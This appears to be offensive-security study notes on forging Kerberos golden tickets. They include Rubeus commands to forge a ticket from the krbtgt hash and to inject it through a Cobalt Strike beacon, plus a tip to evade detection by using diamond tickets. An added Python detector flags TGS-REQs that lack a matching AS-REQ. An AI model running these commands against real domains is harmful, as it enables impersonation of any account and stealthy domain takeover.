A golden ticket is a TGT forged using krbtgt’s password hash (the KDC’s secret key). Golden tickets are very long-lasting, since krbtgt’s hash does not change automatically by default. A golden ticket can be forged to impersonate any chosen user or service; because the PAC is also forged, it can claim that a regular user is a domain admin without altering any group membership in AD.

Golden tickets could be detected

It is possible to detect golden tickets by looking for a TGT presented in a TGS-REQ for which the KDC never saw a matching AS-REQ (the forged TGT was never issued by a DC). To avoid this detection, generate a diamond ticket instead.
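As an added defensive example (not part of the original notes), the TGS-REQ-without-AS-REQ correlation described above, run over a few constructed Windows Security events. Event IDs 4768 (TGT requested, i.e. AS-REQ) and 4769 (service ticket requested, i.e. TGS-REQ) are the real ones; the log lines, account names and the 10-hour default TGT lifetime used as the correlation window are assumptions made for this example.

```python
"""Flag TGS-REQs (4769) with no preceding AS-REQ (4768) for the same account."""
import json
from datetime import datetime, timedelta

# Constructed sample events, shaped like simplified Windows Security log records.
# 4768 = A Kerberos authentication ticket (TGT) was requested  (AS-REQ)
# 4769 = A Kerberos service ticket was requested               (TGS-REQ)
SAMPLE_EVENTS = """
{"EventID": 4768, "TargetUserName": "alice", "IpAddress": "10.0.0.5", "TimeCreated": "2024-05-01T08:00:00"}
{"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "IpAddress": "10.0.0.5", "ServiceName": "cifs/fs01", "TimeCreated": "2024-05-01T08:05:00"}
{"EventID": 4769, "TargetUserName": "Administrator@CORP.LOCAL", "IpAddress": "10.0.0.99", "ServiceName": "cifs/dc01", "TimeCreated": "2024-05-01T09:10:00"}
{"EventID": 4768, "TargetUserName": "bob", "IpAddress": "10.0.0.7", "TimeCreated": "2024-04-30T20:00:00"}
{"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "IpAddress": "10.0.0.7", "ServiceName": "ldap/dc01", "TimeCreated": "2024-05-01T09:30:00"}
"""

# Assumed policy: default "Maximum lifetime for user ticket" is 10 hours. A TGS-REQ
# using a TGT older than that (without a 4770 renewal, not modelled here) is suspect.
MAX_TGT_LIFETIME = timedelta(hours=10)


def normalize_user(name: str) -> str:
    """4769 carries user@REALM, 4768 carries the bare sAMAccountName; unify them."""
    return name.split("@")[0].lower()


def parse_events(text: str) -> list:
    """Parse JSON-lines events and sort them chronologically."""
    events = []
    for line in text.strip().splitlines():
        ev = json.loads(line)
        ev["TimeCreated"] = datetime.fromisoformat(ev["TimeCreated"])
        ev["user"] = normalize_user(ev["TargetUserName"])
        events.append(ev)
    return sorted(events, key=lambda e: e["TimeCreated"])


def find_orphan_tgs(events: list, max_lifetime: timedelta = MAX_TGT_LIFETIME) -> list:
    """Return 4769 events whose account has no 4768 within max_lifetime beforehand.
    Logs from every DC in the domain must be merged first, or a TGT issued by one
    DC and used against another will be reported as a false positive."""
    last_as_req = {}  # user -> time of the most recent AS-REQ seen for that user
    orphans = []
    for ev in events:
        if ev["EventID"] == 4768:
            last_as_req[ev["user"]] = ev["TimeCreated"]
        elif ev["EventID"] == 4769:
            issued = last_as_req.get(ev["user"])
            if issued is None or ev["TimeCreated"] - issued > max_lifetime:
                orphans.append(ev)
    return orphans


if __name__ == "__main__":
    for ev in find_orphan_tgs(parse_events(SAMPLE_EVENTS)):
        print(f"{ev['TimeCreated']} TGS-REQ by {ev['user']} from {ev['IpAddress']} "
              f"for {ev['ServiceName']}: no matching AS-REQ within lifetime")
```

In the constructed sample, Administrator has no AS-REQ at all and bob's TGT is 13.5 hours old, so both TGS-REQs are reported; alice's is not.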

To create a golden ticket using Rubeus:

C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:[krbtgt-hash-base64] /user:[target-user] /domain:[domain-fqdn] /sid:[domain-sid] /nowrap

To use this ticket:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:[domain] /username:[target-user] /password:[does-not-matter] /ticket:[ticket-base64]